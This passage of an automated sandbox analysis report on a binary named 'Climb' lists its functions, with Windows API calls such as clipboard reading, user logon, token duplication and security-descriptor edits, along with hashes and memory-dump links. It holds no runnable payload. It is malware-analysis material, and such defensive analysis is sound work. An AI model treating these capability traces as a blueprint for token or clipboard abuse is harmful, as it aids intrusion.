Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: b4c1e9fe25b8e16d0322b156f5826aac5e194859877060d9cdc05e3bdf822371
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: 1CF0A93650162556E6313A66AC0A7EA3F58BFC3334F100B25F926971D1EA74E88286E2

Function 0056F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0056F987

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: ed6bef072618554d8582e63e6788a44a39010adf91de0d1c4346231481ce419c
Instruction ID: 549acb411a86d623f4401d890414f22e877eab06332cd0bda48b0ca5e6c4fe1b
Opcode Fuzzy Hash: ed6bef072618554d8582e63e6788a44a39010adf91de0d1c4346231481ce419c
Instruction Fuzzy Hash: CFF08176A00105BFDB00EBA5DC4ADAF7BB8FF95720F000059F5059B2A0DE74A980C765

Function 00523B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00516A79,?,0000015D,?,?,?,?,005185B0,000000FF,00000000,?,?), ref: 00523BC5

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f7e083bbb4afcd414454cfeace94163db51cddcc3f0a55b8694ace33757b7247
Instruction ID: d80d096ee92865e105ef7cd24aaf6cb727c991a98a48d1e99a2204a7dc9bc15f
Opcode Fuzzy Hash: f7e083bbb4afcd414454cfeace94163db51cddcc3f0a55b8694ace33757b7247
Instruction Fuzzy Hash: 06E0ED31200A35A6EB203F72BC09F9A3E48BF837A0F140560EC15A60D0DF3CCE8282E0

Function 004F66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1427fd01bdcedb660834d8f44958dc9937c7a9ef37e0a1e6c80beeb5af62a614
Instruction ID: 9b595e5300c10cb041c2c7febd932b1de8b5bd5396a5b544405b66b60b41d515
Opcode Fuzzy Hash: 1427fd01bdcedb660834d8f44958dc9937c7a9ef37e0a1e6c80beeb5af62a614
Instruction Fuzzy Hash: 29F06DB1105702DFDB349FA4D8A5826BBF4BF14329325893EE6D787610C7359884DF54

Function 00546AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00546AE0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3a23867896214bd5a6804ceb89d5718dff137e80e9db4c73e3a19978abd782ae
Instruction ID: 929d77aa361a41efce595be9c9decd3ca6e4040adbb42774f5507d31167deafa
Opcode Fuzzy Hash: 3a23867896214bd5a6804ceb89d5718dff137e80e9db4c73e3a19978abd782ae
Instruction Fuzzy Hash: 62F0E5B1B04605AAE7209B64980ABE6FFE8BB11318F10491ED8D5831C1C7F644D8A763

Function 004F684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 004F6868

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 800092f60a871af972d9351f204c939a32ee319b74ad55ff47470391107fa8f5
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: B6F0F87550020DFFDF05DF90C941EAEBB79FB04358F208449F9159A151D336EA61ABA1

Function 004F3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 004F3963

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: c5c309c0c2a1d8e438e73716bb845f89060edf14c477bb2d914f522f1f238b39
Instruction ID: 7bc79a76a0cea75af087886b08431e02c16029ebafc05cdb4f559307105b64c6
Opcode Fuzzy Hash: c5c309c0c2a1d8e438e73716bb845f89060edf14c477bb2d914f522f1f238b39
Instruction Fuzzy Hash: B8F037709143589FEB529F24DC49BD67BFCB711B08F0044A5A644E6292DBB4578CCF51

Function 004F3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004F3A76

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 199f90cacf0d19161e6d24b07905f401175f4aad17808908741c287f6401312d
Instruction ID: b4509277428093b79d1bf435bfb27fffa725deacafd8223d16061595c3404e0e
Opcode Fuzzy Hash: 199f90cacf0d19161e6d24b07905f401175f4aad17808908741c287f6401312d
Instruction Fuzzy Hash: 5DE0CD7690012857C710A2589C05FEE77EDDFC8790F044075FD05D7254D964DD809694

Function 0053071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00530A84,?,?,00000000,?,00530A84,00000000,0000000C), ref: 00530737

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: fec4bbbb8dcb92baedf5fe2f8c2d3c48679d45a0eff6766846cafb5a77e1c0b4
Instruction ID: 582a20cca0ad49b898f9fa118eb8643ba1bbb6611a6f6fcd60e1cab76ec562ff
Opcode Fuzzy Hash: fec4bbbb8dcb92baedf5fe2f8c2d3c48679d45a0eff6766846cafb5a77e1c0b4
Instruction Fuzzy Hash: FDD06C3200010DBBDF028F84DD46EDA3BAAFB48714F014000BE18A6060C732E821EB90

Function 0055EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0055D840), ref: 0055EAB1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a6b0157bf060acaefd4d3c4ffa456410732655ad1ce91fff3533857a4c3cb431
Instruction ID: 548e401131136b9da470077e7f73baca8dced466b3e50294fa16d30fdb2fb7b6
Opcode Fuzzy Hash: a6b0157bf060acaefd4d3c4ffa456410732655ad1ce91fff3533857a4c3cb431
Instruction Fuzzy Hash: 49B0923800060005AD2C0A389A2E9993B5078523B67DC2BC1FC7EA50E1C3398D0FAA60

Function 0056664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0055DC54: FindFirstFileW.KERNEL32(?,?), ref: 0055DCCB
Part of subcall function 0055DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0055DD1B
Part of subcall function 0055DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0055DD2C
Part of subcall function 0055DC54: FindClose.KERNEL32(00000000), ref: 0055DD43

GetLastError.KERNEL32 ref: 0056666E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 53dbabaa8c6c9aab3a87cbf619b262bda54b5b8c34b759bfef03e64d17d5f692
Instruction ID: dc125d1c00237d47a509f251a42d7a1dda7454dcebecf612ebbe54868a8b3be3
Opcode Fuzzy Hash: 53dbabaa8c6c9aab3a87cbf619b262bda54b5b8c34b759bfef03e64d17d5f692
Instruction Fuzzy Hash: 51F05E362001044FDB14AF59D455B6ABBE5AF94765F04844EF9059B352CB74BC01CB95

Non-executed Functions

Function 00551B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00552010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0055205A
Part of subcall function 00552010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00552087
Part of subcall function 00552010: GetLastError.KERNEL32 ref: 00552097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00551BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00551BF4
CloseHandle.KERNEL32(?), ref: 00551C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00551C1D
GetProcessWindowStation.USER32 ref: 00551C36
SetProcessWindowStation.USER32(00000000), ref: 00551C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00551C5C

Part of subcall function 00551A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00551B48), ref: 00551A20
Part of subcall function 00551A0B: CloseHandle.KERNEL32(?,?,00551B48), ref: 00551A35

Strings

j[, xrefs: 00551CDE
, xrefs: 00551BA6
default, xrefs: 00551C57
winsta0, xrefs: 00551C18

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$j[
API String ID: 22674027-3493177619
Opcode ID: 316bf59db12a149e7d8197027213e3face8e34d5de7e59e472b64a21be50af32
Instruction ID: 79c3ee3e8809219bc8e1edd2636bb37f64ccbc2c8373357fb8a43442ee2e0293
Opcode Fuzzy Hash: 316bf59db12a149e7d8197027213e3face8e34d5de7e59e472b64a21be50af32
Instruction Fuzzy Hash: 5A816572A00609ABDF119FA0DC99FEE7FB8FF04305F14402AFD16A61A0D7358949DB64

Function 005514AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00551A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00551A60
Part of subcall function 00551A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A6C
Part of subcall function 00551A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A7B
Part of subcall function 00551A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A82
Part of subcall function 00551A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00551A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00551518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0055154C
GetLengthSid.ADVAPI32(?), ref: 00551563
GetAce.ADVAPI32(?,00000000,?), ref: 0055159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005515B9
GetLengthSid.ADVAPI32(?), ref: 005515D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 005515D8
HeapAlloc.KERNEL32(00000000), ref: 005515DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00551600
CopySid.ADVAPI32(00000000), ref: 00551607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00551636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00551658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0055166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00551691
HeapFree.KERNEL32(00000000), ref: 00551698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005516A1
HeapFree.KERNEL32(00000000), ref: 005516A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005516B1
HeapFree.KERNEL32(00000000), ref: 005516B8
GetProcessHeap.KERNEL32(00000000,?), ref: 005516C4
HeapFree.KERNEL32(00000000), ref: 005516CB

Part of subcall function 00551ADF: GetProcessHeap.KERNEL32(00000008,005514FD,?,00000000,?,005514FD,?), ref: 00551AED
Part of subcall function 00551ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,005514FD,?), ref: 00551AF4
Part of subcall function 00551ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005514FD,?), ref: 00551B03

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 56504fa69701f1766784b754ce73703665ae1be0faa261e5ec63f64c0fd7a0ba
Instruction ID: aa8c4476cdf48c04e2bef1fb97eb6568c190fcc4c6b0fd5222d7499ba339df4b
Opcode Fuzzy Hash: 56504fa69701f1766784b754ce73703665ae1be0faa261e5ec63f64c0fd7a0ba
Instruction Fuzzy Hash: 007168B690060AABDF10DFA5DC48FAEBFB8BF04351F184516ED15A6190E7319A09CBA4

Function 0056F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0058DCD0), ref: 0056F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 0056F594
GetClipboardData.USER32(0000000D), ref: 0056F5A0
CloseClipboard.USER32 ref: 0056F5AC
GlobalLock.KERNEL32(00000000), ref: 0056F5E4
CloseClipboard.USER32 ref: 0056F5EE
GlobalUnlock.KERNEL32(00000000), ref: 0056F619
IsClipboardFormatAvailable.USER32(00000001), ref: 0056F626
GetClipboardData.USER32(00000001), ref: 0056F62E
GlobalLock.KERNEL32(00000000), ref: 0056F63F
GlobalUnlock.KERNEL32(00000000), ref: 0056F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 0056F695
GetClipboardData.USER32(0000000F), ref: 0056F6A1
GlobalLock.KERNEL32(00000000), ref: 0056F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0056F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0056F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0056F72F
GlobalUnlock.KERNEL32(00000000), ref: 0056F750
CountClipboardFormats.USER32 ref: 0056F771
CloseClipboard.USER32 ref: 0056F7B6

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 23d7d92643ee8619bdfe588dc1dbc8bd2daf62c53965f610735b7ef7fd485e3e
Instruction ID: 64c7d266b0eed84894421754e77ff29832680d9aca584d9b07672e43a2531e89
Opcode Fuzzy Hash: 23d7d92643ee8619bdfe588dc1dbc8bd2daf62c53965f610735b7ef7fd485e3e
Instruction Fuzzy Hash: F161A834204205AFC300EF21E888E3ABBE4FF94358F14446DF946972A2DB31E949DB62

Function 005673D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00567403
FindClose.KERNEL32(00000000), ref: 00567457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00567493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005674BA

Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333

FileTimeToSystemTime.KERNEL32(?,?), ref: 005674F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00567524

Strings

%03d, xrefs: 005677E7
%4d, xrefs: 005675F6
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00567577
%02d, xrefs: 00567645, 0056764F, 0056769F, 005676EF, 0056773F, 0056778F
%4d%02d%02d%02d%02d%02d, xrefs: 005675AF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: a622b133b380300cb3776efbb0833e844615935cde06be47ee12cd9b98fd5f12
Instruction ID: 4b4d804d7e780456a6b029727b1923b11017c8cac56cc82b892fdda39c687578
Opcode Fuzzy Hash: a622b133b380300cb3776efbb0833e844615935cde06be47ee12cd9b98fd5f12
Instruction Fuzzy Hash: EBD13E71508348AAC710EB65C845EBBB7ECFF98708F44091EF685D7191EB78DA44CBA2

Function 0056A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0056A0A8
GetFileAttributesW.KERNEL32(?), ref: 0056A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 0056A100
FindNextFileW.KERNEL32(00000000,?), ref: 0056A118
FindClose.KERNEL32(00000000), ref: 0056A123
FindFirstFileW.KERNEL32(*.*,?), ref: 0056A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 0056A18F
SetCurrentDirectoryW.KERNEL32(005B7B94), ref: 0056A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 0056A1B7
FindClose.KERNEL32(00000000), ref: 0056A1C4
FindClose.KERNEL32(00000000), ref: 0056A1D4

Strings

*.*, xrefs: 0056A13A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: c51e252e51ee59d62a331aca1987765179797e53600480bd3c3c6540ec7b9555
Instruction ID: a4a3b27e0b7caa2e32b572c45e08322ab24df6537621d3950b9abf6890645658
Opcode Fuzzy Hash: c51e252e51ee59d62a331aca1987765179797e53600480bd3c3c6540ec7b9555
Instruction Fuzzy Hash: 0631A2316002196BEB14ABA4DC49ADE7BECBF4A360F100595E816F30D0EB74DE85DF65

Function 00564763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00564785
_wcslen.LIBCMT ref: 005647B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 005647E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00564803
